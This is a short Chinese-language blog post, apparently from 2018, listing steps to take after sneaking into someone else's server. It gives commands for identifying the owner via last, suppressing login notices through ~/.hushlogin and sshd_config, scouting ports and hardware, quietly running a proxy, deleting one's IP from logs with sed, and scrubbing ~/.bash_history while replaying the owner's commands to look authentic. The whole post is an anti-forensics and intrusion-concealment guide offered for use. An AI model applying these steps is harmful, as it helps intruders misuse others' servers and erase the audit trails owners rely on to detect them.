溜進一個服務器後臺,需要做的事兒(滑稽)
阿新 • • 發佈:2018-06-02
發現 配置文件 提示 AR -i 重新 history 什麽 test
進入一臺服務器後臺後,興奮之余還是要思考一下怎麽消無聲息的溜進再溜出。
話不多說,直接上命令。
1、用last命令查看這臺服務器的登錄情況,能知道是它的主人是誰(ip)
#last
2、隱藏本次登錄信息
#touch ~/.hushlogin
解釋:與上次不同的ip登錄時,登進去後會提示上次登錄信息,執行一下此命令就不會了,但是用last命令還是能發現
或者修改一下ssh配置文件
#vim /etc/ssh/sshd_config
#PrintLastLog yes 改為為 PrintLastLog no
#/etc/init.d/sshd restart 重起服務
3、查看服務器監聽的端口號,能知道都開了什麽服務
#netstat -lntp
這裏就需要靠自己自己判斷有什麽服務了,代理服務之類的可以記一下自己用(滑稽)
4、查看分區信息
#df -h
磁盤如果很小的話就可能是虛擬機
5、查看CPU信息
#cat /proc/cpuinfo
6、悄悄的搭個代理什麽的,但是要註意日誌文件有可能留下痕跡
其他還想幹點什麽就自己想吧
7、清除一些日誌
#sed -i ‘/127.0.0.1/d‘ test.log
刪除test.log文件中含127.0.0.1的行,這樣把跟自己ip有關的行清除
可以用腳本遍歷所有可能記錄的日誌文件,然後清除
8、清除自己操作的命令,這個需要斷開這然後重新登錄,因為命令日誌文件裏不保存這次登錄操作的命令
#vim ~/.bash_history
shift+G定位到最後一行,然後清除自己的操作命令
然後也可以復制一下服務器主人以前的命令,運行一下,這就比較逼真了
ps:當然不能完全隱藏登錄信息,發現不足之處再來更新
僅供參考,如有錯誤 歡迎指正
溜進一個服務器後臺,需要做的事兒(滑稽)